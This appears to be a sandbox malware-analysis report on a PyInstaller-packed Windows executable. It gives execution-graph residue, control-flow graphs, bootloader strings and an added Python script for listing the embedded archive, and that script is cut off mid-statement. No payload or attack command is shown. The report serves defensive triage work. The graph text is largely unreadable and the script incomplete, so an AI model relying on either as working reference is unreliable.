7ff7c2661b6f 16197->16201 16199 7ff7c2662910 54 API calls 16198->16199 16199->16178 16202 7ff7c2674f78 memcpy_s 11 API calls 16200->16202 17025 7ff7c2670180 16201->17025 16204 7ff7c2661b55 16202->16204 16206 7ff7c2662910 54 API calls 16204->16206 16206->16178 16207 7ff7c2662710 54 API calls 16207->16178 16209 7ff7c2668a2a 16208->16209 16210 7ff7c2669400 2 API calls 16209->16210 16211 7ff7c2668a49 GetEnvironmentVariableW 16210->16211 16212 7ff7c2668a66 ExpandEnvironmentStringsW 16211->16212 16213 7ff7c2668ab2 16211->16213 16212->16213 16215 7ff7c2668a88 16212->16215 16214 7ff7c266c5c0 _log10_special 8 API calls 16213->16214 16216 7ff7c2668ac4 16214->16216 16217 7ff7c26694b0 2 API calls 16215->16217 16216->15967 16218 7ff7c2668a9a 16217->16218 16219 7ff7c266c5c0 _log10_special 8 API calls 16218->16219 16220 7ff7c2668aaa 16219->16220 16220->15967 16222 7ff7c2669400 2 API calls 16221->16222 16223 7ff7c2668b4c 16222->16223 16224 7ff7c2669400 2 API calls 16223->16224 16225 7ff7c2668b5c 16224->16225 17243 7ff7c26782a8 16225->17243 16227 7ff7c2668b6a __std_exception_destroy 16227->16007 16229 7ff7c26690f5 16228->16229 17261 7ff7c2668760 GetCurrentProcess OpenProcessToken 16229->17261 16232 7ff7c2668760 7 API calls 16233 7ff7c2669121 16232->16233 16234 7ff7c266913a 16233->16234 16235 7ff7c2669154 16233->16235 16236 7ff7c26626b0 48 API calls 16234->16236 16237 7ff7c26626b0 48 API calls 16235->16237 16238 7ff7c2669152 16236->16238 16239 7ff7c2669167 LocalFree LocalFree 16237->16239 16238->16239 16240 7ff7c2669183 16239->16240 16242 7ff7c266918f 16239->16242 17271 7ff7c2662b50 16240->17271 16243 7ff7c266c5c0 _log10_special 8 API calls 16242->16243 16244 7ff7c2663c55 16243->16244 16244->16012 16245 7ff7c2668850 16244->16245 16246 7ff7c2668868 16245->16246 16247 7ff7c266888c 16246->16247 16248 7ff7c26688ea GetTempPathW GetCurrentProcessId 16246->16248 16250 7ff7c2668a20 14 API calls 16247->16250 17280 7ff7c26625c0 16248->17280 16251 7ff7c2668898 16250->16251 17287 7ff7c26681c0 
[Execution graph residue, continued: the node labels and edges of the rendered execution graph spilled into text. Each node is a graph id, a code address in the sample's image (7ff7c2661xxx to 7ff7c2688xxx) and, where resolved, the symbol or Windows API at that address; each edge is written "caller->callee" and some nodes carry an API-call count. Symbols and APIs named in this portion of the graph: __std_exception_destroy, __std_exception_copy, _log10_special, _invalid_parameter_noinfo, _fread_nolock, _isindst, memcpy_s, fegetenv, __crtLCMapStringW, __FrameHandler3::FrameUnwindToEmptyState, Concurrency::details::SchedulerProxy::DeleteThis, MultiByteToWideChar, WideCharToMultiByte, LocalFree, HeapAlloc, RtlFreeHeap, GetCurrentProcessId, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, EnterCriticalSection, GetLastError, SetLastError, FlsGetValue, FlsSetValue, GetModuleFileNameW, GetFinalPathNameByHandleW, FindClose, CloseHandle, FormatMessageW, MessageBoxA, MessageBoxW, GetTokenInformation, ConvertSidToStringSidW, ExpandEnvironmentStringsW, CreateDirectoryW. The graph layout itself is not recoverable as text.]
RtlLookupFunctionEntry 18272->18273 18274 7ff7c266cb78 RtlVirtualUnwind 18273->18274 18275 7ff7c266c97b 18273->18275 18274->18273 18274->18275 18276 7ff7c266c910 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 18275->18276 18278 7ff7c26645b0 108 API calls 18277->18278 18279 7ff7c2661493 18278->18279 18280 7ff7c26614bc 18279->18280 18281 7ff7c266149b 18279->18281 18283 7ff7c2670744 73 API calls 18280->18283 18282 7ff7c2662710 54 API calls 18281->18282 18285 7ff7c26614ab 18282->18285 18284 7ff7c26614d1 18283->18284 18286 7ff7c26614f8 18284->18286 18287 7ff7c26614d5 18284->18287 18285->16369 18384 7ff7c2666365 18383->18384 18385 7ff7c2661c80 49 API calls 18384->18385 18386 7ff7c26663a1 18385->18386 18387 7ff7c26663cd 18386->18387 18388 7ff7c26663aa 18386->18388 18390 7ff7c2664620 49 API calls 18387->18390 18389 7ff7c2662710 54 API calls 18388->18389 18406 7ff7c26663c3 18389->18406 18391 7ff7c26663e5 18390->18391 18392 7ff7c2666403 18391->18392 18393 7ff7c2662710 54 API calls 18391->18393 18394 7ff7c2664550 10 API calls 18392->18394 18393->18392 18397 7ff7c266640d 18394->18397 18395 7ff7c266c5c0 _log10_special 8 API calls 18396 7ff7c266336e 18395->18396 18396->16443 18414 7ff7c26664f0 18396->18414 18406->18395 18563 7ff7c26653f0 18414->18563 18673 7ff7c267b1c0 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 18672->18673 18675 7ff7c267a451 18673->18675 18677 7ff7c267a574 18675->18677 18686 7ff7c26836c0 18677->18686 18712 7ff7c2683678 18686->18712 18717 7ff7c2680348 EnterCriticalSection 18712->18717 19359 7ff7c2675698 19360 7ff7c26756b2 19359->19360 19361 7ff7c26756cf 19359->19361 19362 7ff7c2674f58 _fread_nolock 11 API calls 19360->19362 19361->19360 19363 7ff7c26756e2 CreateFileW 19361->19363 19366 7ff7c26756b7 19362->19366 19364 7ff7c267574c 19363->19364 19365 7ff7c2675716 19363->19365 19410 7ff7c2675c74 19364->19410 19384 7ff7c26757ec GetFileType 19365->19384 19369 7ff7c2674f78 memcpy_s 11 API calls 19366->19369 19372 
7ff7c26756bf 19369->19372 19377 7ff7c267a950 _invalid_parameter_noinfo 37 API calls 19372->19377 19373 7ff7c267572b CloseHandle 19378 7ff7c26756ca 19373->19378 19374 7ff7c2675741 CloseHandle 19374->19378 19375 7ff7c2675755 19379 7ff7c2674eec _fread_nolock 11 API calls 19375->19379 19376 7ff7c2675780 19431 7ff7c2675a34 19376->19431 19377->19378 19383 7ff7c267575f 19379->19383 19383->19378 19385 7ff7c267583a 19384->19385 19386 7ff7c26758f7 19384->19386 19387 7ff7c2675866 GetFileInformationByHandle 19385->19387 19391 7ff7c2675b70 21 API calls 19385->19391 19388 7ff7c2675921 19386->19388 19389 7ff7c26758ff 19386->19389 19392 7ff7c2675912 GetLastError 19387->19392 19393 7ff7c267588f 19387->19393 19390 7ff7c2675944 PeekNamedPipe 19388->19390 19409 7ff7c26758e2 19388->19409 19389->19392 19394 7ff7c2675903 19389->19394 19390->19409 19396 7ff7c2675854 19391->19396 19395 7ff7c2674eec _fread_nolock 11 API calls 19392->19395 19397 7ff7c2675a34 51 API calls 19393->19397 19398 7ff7c2674f78 memcpy_s 11 API calls 19394->19398 19395->19409 19396->19387 19396->19409 19400 7ff7c267589a 19397->19400 19398->19409 19399 7ff7c266c5c0 _log10_special 8 API calls 19401 7ff7c2675724 19399->19401 19448 7ff7c2675994 19400->19448 19401->19373 19401->19374 19404 7ff7c2675994 10 API calls 19405 7ff7c26758b9 19404->19405 19406 7ff7c2675994 10 API calls 19405->19406 19407 7ff7c26758ca 19406->19407 19408 7ff7c2674f78 memcpy_s 11 API calls 19407->19408 19407->19409 19408->19409 19409->19399 19411 7ff7c2675caa 19410->19411 19412 7ff7c2675d42 __std_exception_destroy 19411->19412 19413 7ff7c2674f78 memcpy_s 11 API calls 19411->19413 19414 7ff7c266c5c0 _log10_special 8 API calls 19412->19414 19415 7ff7c2675cbc 19413->19415 19416 7ff7c2675751 19414->19416 19417 7ff7c2674f78 memcpy_s 11 API calls 19415->19417 19416->19375 19416->19376 19418 7ff7c2675cc4 19417->19418 19419 7ff7c2677e78 45 API calls 19418->19419 19420 7ff7c2675cd9 19419->19420 19421 7ff7c2675ceb 19420->19421 19422 7ff7c2675ce1 19420->19422 
19424 7ff7c2674f78 memcpy_s 11 API calls 19421->19424 19423 7ff7c2674f78 memcpy_s 11 API calls 19422->19423 19430 7ff7c2675ce6 19423->19430 19425 7ff7c2675cf0 19424->19425 19425->19412 19426 7ff7c2674f78 memcpy_s 11 API calls 19425->19426 19427 7ff7c2675cfa 19426->19427 19428 7ff7c2677e78 45 API calls 19427->19428 19428->19430 19429 7ff7c2675d34 GetDriveTypeW 19429->19412 19430->19412 19430->19429 19433 7ff7c2675a5c 19431->19433 19432 7ff7c267578d 19441 7ff7c2675b70 19432->19441 19433->19432 19455 7ff7c267f794 19433->19455 19435 7ff7c2675af0 19435->19432 19436 7ff7c267f794 51 API calls 19435->19436 19437 7ff7c2675b03 19436->19437 19437->19432 19438 7ff7c267f794 51 API calls 19437->19438 19439 7ff7c2675b16 19438->19439 19439->19432 19440 7ff7c267f794 51 API calls 19439->19440 19440->19432 19442 7ff7c2675b8a 19441->19442 19443 7ff7c2675bc1 19442->19443 19444 7ff7c2675b9a 19442->19444 19445 7ff7c267f628 21 API calls 19443->19445 19446 7ff7c2675baa 19444->19446 19447 7ff7c2674eec _fread_nolock 11 API calls 19444->19447 19445->19446 19446->19383 19447->19446 19449 7ff7c26759bd FileTimeToSystemTime 19448->19449 19450 7ff7c26759b0 19448->19450 19451 7ff7c26759d1 SystemTimeToTzSpecificLocalTime 19449->19451 19452 7ff7c26759b8 19449->19452 19450->19449 19450->19452 19451->19452 19453 7ff7c266c5c0 _log10_special 8 API calls 19452->19453 19454 7ff7c26758a9 19453->19454 19454->19404 19456 7ff7c267f7c5 19455->19456 19457 7ff7c267f7a1 19455->19457 19460 7ff7c267f7ff 19456->19460 19462 7ff7c267f81e 19456->19462 19457->19456 19458 7ff7c267f7a6 19457->19458 19459 7ff7c2674f78 memcpy_s 11 API calls 19458->19459 19463 7ff7c267f7ab 19459->19463 19461 7ff7c2674f78 memcpy_s 11 API calls 19460->19461 19464 7ff7c267f804 19461->19464 19465 7ff7c2674fbc 45 API calls 19462->19465 19466 7ff7c267a950 _invalid_parameter_noinfo 37 API calls 19463->19466 19467 7ff7c267a950 _invalid_parameter_noinfo 37 API calls 19464->19467 19471 7ff7c267f82b 19465->19471 19468 7ff7c267f7b6 19466->19468 19470 
7ff7c267f80f 19467->19470 19468->19435 19469 7ff7c268054c 51 API calls 19469->19471 19470->19435 19471->19469 19471->19470 19695 7ff7c2681720 19706 7ff7c2687454 19695->19706 19707 7ff7c2687461 19706->19707 19708 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19707->19708 19709 7ff7c268747d 19707->19709 19708->19707 19710 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19709->19710 19711 7ff7c2681729 19709->19711 19710->19709 19712 7ff7c2680348 EnterCriticalSection 19711->19712

Control-flow Graph

• Executed
• Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 0 7ff7c2668bd0-7ff7c2668d16 call 7ff7c266c8c0 call 7ff7c2669400 SetConsoleCtrlHandler GetStartupInfoW call 7ff7c2675460 call 7ff7c267a4ec call 7ff7c267878c call 7ff7c2675460 call 7ff7c267a4ec call 7ff7c267878c call 7ff7c2675460 call 7ff7c267a4ec call 7ff7c267878c GetCommandLineW CreateProcessW 23 7ff7c2668d3d-7ff7c2668d79 RegisterClassW 0->23 24 7ff7c2668d18-7ff7c2668d38 GetLastError call 7ff7c2662c50 0->24 26 7ff7c2668d7b GetLastError 23->26 27 7ff7c2668d81-7ff7c2668dd5 CreateWindowExW 23->27 32 7ff7c2669029-7ff7c266904f call 7ff7c266c5c0 24->32 26->27 28 7ff7c2668dd7-7ff7c2668ddd GetLastError 27->28 29 7ff7c2668ddf-7ff7c2668de4 ShowWindow 27->29 31 7ff7c2668dea-7ff7c2668dfa WaitForSingleObject 28->31 29->31 33 7ff7c2668dfc 31->33 34 7ff7c2668e78-7ff7c2668e7f 31->34 37 7ff7c2668e00-7ff7c2668e03 33->37 38 7ff7c2668e81-7ff7c2668e91 WaitForSingleObject 34->38 39 7ff7c2668ec2-7ff7c2668ec9 34->39 42 7ff7c2668e0b-7ff7c2668e12 37->42 43 7ff7c2668e05 GetLastError 37->43 44 7ff7c2668e97-7ff7c2668ea7 TerminateProcess 38->44 45 7ff7c2668fe8-7ff7c2668ff2 38->45 40 7ff7c2668ecf-7ff7c2668ee5 QueryPerformanceFrequency QueryPerformanceCounter 39->40 41 7ff7c2668fb0-7ff7c2668fc9 GetMessageW 39->41 46 7ff7c2668ef0-7ff7c2668f28 MsgWaitForMultipleObjects PeekMessageW 40->46 48 7ff7c2668fcb-7ff7c2668fd9 TranslateMessage DispatchMessageW 41->48 49 7ff7c2668fdf-7ff7c2668fe6 41->49 42->38 47 7ff7c2668e14-7ff7c2668e31 PeekMessageW 42->47 43->42 52 7ff7c2668ea9 GetLastError 44->52 53 7ff7c2668eaf-7ff7c2668ebd WaitForSingleObject 44->53 50 7ff7c2668ff4-7ff7c2668ffa DestroyWindow 45->50 51 7ff7c2669001-7ff7c2669025 GetExitCodeProcess CloseHandle * 2 45->51 54 7ff7c2668f2a 46->54 55 7ff7c2668f63-7ff7c2668f6a 46->55 56 
7ff7c2668e66-7ff7c2668e76 WaitForSingleObject 47->56 57 7ff7c2668e33-7ff7c2668e64 TranslateMessage DispatchMessageW PeekMessageW 47->57 48->49 49->41 49->45 50->51 51->32 52->53 53->45 58 7ff7c2668f30-7ff7c2668f61 TranslateMessage DispatchMessageW PeekMessageW 54->58 55->41 59 7ff7c2668f6c-7ff7c2668f95 QueryPerformanceCounter 55->59 56->34 56->37 57->56 57->57 58->55 58->58 59->46 60 7ff7c2668f9b-7ff7c2668fa2 59->60 60->45 61 7ff7c2668fa4-7ff7c2668fa8 60->61 61->41
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
• String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
• API String ID: 3832162212-3165540532
• Opcode ID: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
• Instruction ID: e773f5bb6d2d9a308ee931383deb18d7a64ca4687a63f0e4beac69a3de8c7f4d
• Opcode Fuzzy Hash: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
• Instruction Fuzzy Hash: 96D18431A08B8286E710AF74E8542A9B772FB44B68F800235DA9D63FA5DFBCD544C774

Control-flow Graph

• Executed
• Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 62 7ff7c2661000-7ff7c2663806 call 7ff7c266fe88 call 7ff7c266fe90 call 7ff7c266c8c0 call 7ff7c2675460 call 7ff7c26754f4 call 7ff7c26636b0 76 7ff7c2663808-7ff7c266380f 62->76 77 7ff7c2663814-7ff7c2663836 call 7ff7c2661950 62->77 78 7ff7c2663c97-7ff7c2663cb2 call 7ff7c266c5c0 76->78 82 7ff7c266383c-7ff7c2663856 call 7ff7c2661c80 77->82 83 7ff7c266391b-7ff7c2663931 call 7ff7c26645b0 77->83 87 7ff7c266385b-7ff7c266389b call 7ff7c2668a20 82->87 90 7ff7c266396a-7ff7c266397f call 7ff7c2662710 83->90 91 7ff7c2663933-7ff7c2663960 call 7ff7c2667f80 83->91 96 7ff7c266389d-7ff7c26638a3 87->96 97 7ff7c26638c1-7ff7c26638cc call 7ff7c2674fa0 87->97 101 7ff7c2663c8f 90->101 99 7ff7c2663984-7ff7c26639a6 call 7ff7c2661c80 91->99 100 7ff7c2663962-7ff7c2663965 call 7ff7c26700bc 91->100 102 7ff7c26638a5-7ff7c26638ad 96->102 103 7ff7c26638af-7ff7c26638bd call 7ff7c2668b90 96->103 109 7ff7c26639fc-7ff7c2663a2a call 7ff7c2668b30 call 7ff7c2668b90 * 3 97->109 110 7ff7c26638d2-7ff7c26638e1 call 7ff7c2668a20 97->110 115 7ff7c26639b0-7ff7c26639b9 99->115 100->90 101->78 102->103 103->97 138 7ff7c2663a2f-7ff7c2663a3e call 7ff7c2668a20 109->138 119 7ff7c26638e7-7ff7c26638ed 110->119 120 7ff7c26639f4-7ff7c26639f7 call 7ff7c2674fa0 110->120 115->115 118 7ff7c26639bb-7ff7c26639d8 call 7ff7c2661950 115->118 118->87 130 7ff7c26639de-7ff7c26639ef call 7ff7c2662710 118->130 124 7ff7c26638f0-7ff7c26638fc 119->124 120->109 127 7ff7c26638fe-7ff7c2663903 124->127 128 7ff7c2663905-7ff7c2663908 124->128 127->124 127->128 128->120 131 7ff7c266390e-7ff7c2663916 call 7ff7c2674fa0 128->131 130->101 131->138 141 7ff7c2663a44-7ff7c2663a47 138->141 142 7ff7c2663b45-7ff7c2663b53 138->142 141->142 145 7ff7c2663a4d-7ff7c2663a50 141->145 143 
7ff7c2663a67 142->143 144 7ff7c2663b59-7ff7c2663b5d 142->144 146 7ff7c2663a6b-7ff7c2663a90 call 7ff7c2674fa0 143->146 144->146 147 7ff7c2663b14-7ff7c2663b17 145->147 148 7ff7c2663a56-7ff7c2663a5a 145->148 157 7ff7c2663aab-7ff7c2663ac0 146->157 158 7ff7c2663a92-7ff7c2663aa6 call 7ff7c2668b30 146->158 149 7ff7c2663b19-7ff7c2663b1d 147->149 150 7ff7c2663b2f-7ff7c2663b40 call 7ff7c2662710 147->150 148->147 152 7ff7c2663a60 148->152 149->150 153 7ff7c2663b1f-7ff7c2663b2a 149->153 159 7ff7c2663c7f-7ff7c2663c87 150->159 152->143 153->146 161 7ff7c2663be8-7ff7c2663bfa call 7ff7c2668a20 157->161 162 7ff7c2663ac6-7ff7c2663aca 157->162 158->157 159->101 170 7ff7c2663bfc-7ff7c2663c02 161->170 171 7ff7c2663c2e 161->171 164 7ff7c2663bcd-7ff7c2663be2 call 7ff7c2661940 162->164 165 7ff7c2663ad0-7ff7c2663ae8 call 7ff7c26752c0 162->165 164->161 164->162 175 7ff7c2663aea-7ff7c2663b02 call 7ff7c26752c0 165->175 176 7ff7c2663b62-7ff7c2663b7a call 7ff7c26752c0 165->176 173 7ff7c2663c1e-7ff7c2663c2c 170->173 174 7ff7c2663c04-7ff7c2663c1c 170->174 177 7ff7c2663c31-7ff7c2663c40 call 7ff7c2674fa0 171->177 173->177 174->177 175->164 188 7ff7c2663b08-7ff7c2663b0f 175->188 186 7ff7c2663b7c-7ff7c2663b80 176->186 187 7ff7c2663b87-7ff7c2663b9f call 7ff7c26752c0 176->187 184 7ff7c2663c46-7ff7c2663c4a 177->184 185 7ff7c2663d41-7ff7c2663d63 call 7ff7c26644d0 177->185 189 7ff7c2663cd4-7ff7c2663ce6 call 7ff7c2668a20 184->189 190 7ff7c2663c50-7ff7c2663c5f call 7ff7c26690e0 184->190 199 7ff7c2663d65-7ff7c2663d6f call 7ff7c2664620 185->199 200 7ff7c2663d71-7ff7c2663d82 call 7ff7c2661c80 185->200 186->187 201 7ff7c2663bac-7ff7c2663bc4 call 7ff7c26752c0 187->201 202 7ff7c2663ba1-7ff7c2663ba5 187->202 188->164 206 7ff7c2663ce8-7ff7c2663ceb 189->206 207 7ff7c2663d35-7ff7c2663d3c 189->207 204 7ff7c2663cb3-7ff7c2663cb6 call 7ff7c2668850 190->204 205 7ff7c2663c61 190->205 214 7ff7c2663d87-7ff7c2663d96 199->214 200->214 201->164 216 7ff7c2663bc6 201->216 202->201 221 7ff7c2663cbb-7ff7c2663cbd 204->221 211 
7ff7c2663c68 call 7ff7c2662710 205->211 206->207 212 7ff7c2663ced-7ff7c2663d10 call 7ff7c2661c80 206->212 207->211 224 7ff7c2663c6d-7ff7c2663c77 211->224 229 7ff7c2663d2b-7ff7c2663d33 call 7ff7c2674fa0 212->229 230 7ff7c2663d12-7ff7c2663d26 call 7ff7c2662710 call 7ff7c2674fa0 212->230 219 7ff7c2663d98-7ff7c2663d9f 214->219 220 7ff7c2663dc4-7ff7c2663dda call 7ff7c2669400 214->220 216->164 219->220 226 7ff7c2663da1-7ff7c2663da5 219->226 232 7ff7c2663ddc 220->232 233 7ff7c2663de8-7ff7c2663e04 SetDllDirectoryW 220->233 222 7ff7c2663cc8-7ff7c2663ccf 221->222 223 7ff7c2663cbf-7ff7c2663cc6 221->223 222->214 223->211 224->159 226->220 231 7ff7c2663da7-7ff7c2663dbe SetDllDirectoryW LoadLibraryExW 226->231 229->214 230->224 231->220 232->233 237 7ff7c2663e0a-7ff7c2663e19 call 7ff7c2668a20 233->237 238 7ff7c2663f01-7ff7c2663f08 233->238 251 7ff7c2663e1b-7ff7c2663e21 237->251 252 7ff7c2663e32-7ff7c2663e3c call 7ff7c2674fa0 237->252 242 7ff7c2663ffc-7ff7c2664004 238->242 243 7ff7c2663f0e-7ff7c2663f15 238->243 245 7ff7c2664029-7ff7c266405b call 7ff7c26636a0 call 7ff7c2663360 call 7ff7c2663670 call 7ff7c2666fb0 call 7ff7c2666d60 242->245 246 7ff7c2664006-7ff7c2664023 PostMessageW GetMessageW 242->246 243->242 244 7ff7c2663f1b-7ff7c2663f25 call 7ff7c26633c0 243->244 244->224 258 7ff7c2663f2b-7ff7c2663f3f call 7ff7c26690c0 244->258 246->245 255 7ff7c2663e2d-7ff7c2663e2f 251->255 256 7ff7c2663e23-7ff7c2663e2b 251->256 263 7ff7c2663ef2-7ff7c2663efc call 7ff7c2668b30 252->263 264 7ff7c2663e42-7ff7c2663e48 252->264 255->252 256->255 269 7ff7c2663f64-7ff7c2663fa0 call 7ff7c2668b30 call 7ff7c2668bd0 call 7ff7c2666fb0 call 7ff7c2666d60 call 7ff7c2668ad0 258->269 270 7ff7c2663f41-7ff7c2663f5e PostMessageW GetMessageW 258->270 263->238 264->263 268 7ff7c2663e4e-7ff7c2663e54 264->268 272 7ff7c2663e56-7ff7c2663e58 268->272 273 7ff7c2663e5f-7ff7c2663e61 268->273 306 7ff7c2663fa5-7ff7c2663fa7 269->306 270->269 274 7ff7c2663e67-7ff7c2663e83 call 7ff7c2666db0 call 7ff7c2667330 272->274 275 
7ff7c2663e5a 272->275 273->238 273->274 289 7ff7c2663e8e-7ff7c2663e95 274->289 290 7ff7c2663e85-7ff7c2663e8c 274->290 275->238 293 7ff7c2663e97-7ff7c2663ea4 call 7ff7c2666df0 289->293 294 7ff7c2663eaf-7ff7c2663eb9 call 7ff7c26671a0 289->294 292 7ff7c2663edb-7ff7c2663ef0 call 7ff7c2662a50 call 7ff7c2666fb0 call 7ff7c2666d60 290->292 292->238 293->294 308 7ff7c2663ea6-7ff7c2663ead 293->308 304 7ff7c2663ebb-7ff7c2663ec2 294->304 305 7ff7c2663ec4-7ff7c2663ed2 call 7ff7c26674e0 294->305 304->292 305->238 317 7ff7c2663ed4 305->317 310 7ff7c2663fe9-7ff7c2663ff7 call 7ff7c2661900 306->310 311 7ff7c2663fa9-7ff7c2663fb3 call 7ff7c2669200 306->311 308->292 310->224 311->310 321 7ff7c2663fb5-7ff7c2663fca 311->321 317->292 322 7ff7c2663fcc-7ff7c2663fdf call 7ff7c2662710 call 7ff7c2661900 321->322 323 7ff7c2663fe4 call 7ff7c2662a50 321->323 322->224 323->310
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: ErrorFileLastModuleName
• String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
• API String ID: 2776309574-3273434969
• Opcode ID: 230e5f2fbe18b706386c2e6c5de042c78cdf1bdf29ac743ce162c0a9040f007d
• Instruction ID: a126fb637c7a3bb1d0b2850f1203ae32a2a722ba97f7b845208a13040d220de5
• Opcode Fuzzy Hash: 230e5f2fbe18b706386c2e6c5de042c78cdf1bdf29ac743ce162c0a9040f007d
• Instruction Fuzzy Hash: 13328021A0868291FB14BF2194543B9A673AF55BA4FC44032DACD63BD6DFBCE568C334
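The String ID list above (MEI, _PYI_ARCHIVE_FILE, PYINSTALLER_STRICT_UNPACK_MODE, pyi-contents-directory, "Could not load PyInstaller's embedded PKG archive from the executable") is the message table of the PyInstaller onefile bootloader, so process 4 is a Python program wrapped by PyInstaller rather than hand-written native code: the bootloader unpacks its embedded PKG archive into a per-run temporary directory, runs the bundled entry script, and deletes the directory again on exit. The Python script below is an added triage example, not part of the Joe Sandbox report or of the sample. It locates the PyInstaller archive cookie (magic MEI\x0c\x0b\x0a\x0b\x0e) at the end of the PKG, walks the table of contents and lists the entry scripts, which in a PyInstaller-built grabber are where the actual payload lives. The cookie and TOC layouts follow PyInstaller's CArchiveReader (PyInstaller/archive/readers.py); the archive it builds and scans is constructed sample data, and the file names in it are assumptions, not names taken from the analysed binary.

```python
"""Triage check for a PyInstaller onefile executable: find the CArchive cookie
and list the embedded table of contents (TOC).

Added example for this report, not code from Joe Sandbox or from the sample.
Layouts follow PyInstaller's CArchiveReader; everything marked "constructed"
below is synthetic test data."""
import struct
import sys
import zlib

COOKIE_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"
# magic, package length, TOC offset (relative to package start), TOC length,
# Python version, Python DLL name
COOKIE_FMT = "!8sIIii64s"
COOKIE_LEN = struct.calcsize(COOKIE_FMT)            # 88 bytes
# entry length, data offset, compressed length, uncompressed length,
# compression flag, type code; then a NUL-terminated name padded to 16 bytes
TOC_ENTRY_FMT = "!iIIIBc"
TOC_ENTRY_LEN = struct.calcsize(TOC_ENTRY_FMT)      # 18 bytes

TYPECODES = {
    b"s": "entry script", b"m": "python module", b"M": "python package",
    b"z": "PYZ archive", b"Z": "zip file", b"b": "binary (DLL/.pyd)",
    b"d": "dependency", b"x": "data file", b"o": "runtime option",
    b"l": "splash resources",
}


def find_cookie(data):
    """Return (cookie_offset, fields) or None. The cookie is the last 88 bytes
    of the PKG, which is appended to the bootloader PE, so search from the end."""
    pos = data.rfind(COOKIE_MAGIC)
    if pos < 0 or pos + COOKIE_LEN > len(data):
        return None
    _, pkg_len, toc_off, toc_len, pyver, pylib = struct.unpack_from(COOKIE_FMT, data, pos)
    if pkg_len > pos + COOKIE_LEN or toc_off + toc_len > pkg_len:
        return None                    # sizes do not fit the file: not a real cookie
    return pos, {"pkg_len": pkg_len, "toc_off": toc_off, "toc_len": toc_len,
                 "python_version": pyver,
                 "python_lib": pylib.split(b"\x00", 1)[0].decode(errors="replace")}


def list_toc(data):
    """Parse the TOC; returns (cookie_fields, entries) or None if no cookie."""
    found = find_cookie(data)
    if found is None:
        return None
    cookie_pos, cookie = found
    archive_start = cookie_pos + COOKIE_LEN - cookie["pkg_len"]
    pos = archive_start + cookie["toc_off"]
    end = pos + cookie["toc_len"]
    entries = []
    while pos < end:
        entry_len, off, clen, ulen, cflag, typecode = struct.unpack_from(TOC_ENTRY_FMT, data, pos)
        if entry_len < TOC_ENTRY_LEN or pos + entry_len > end:
            raise ValueError("corrupt TOC entry at file offset %#x" % pos)
        name = data[pos + TOC_ENTRY_LEN:pos + entry_len].split(b"\x00", 1)[0]
        entries.append({"name": name.decode(errors="replace"), "type": typecode,
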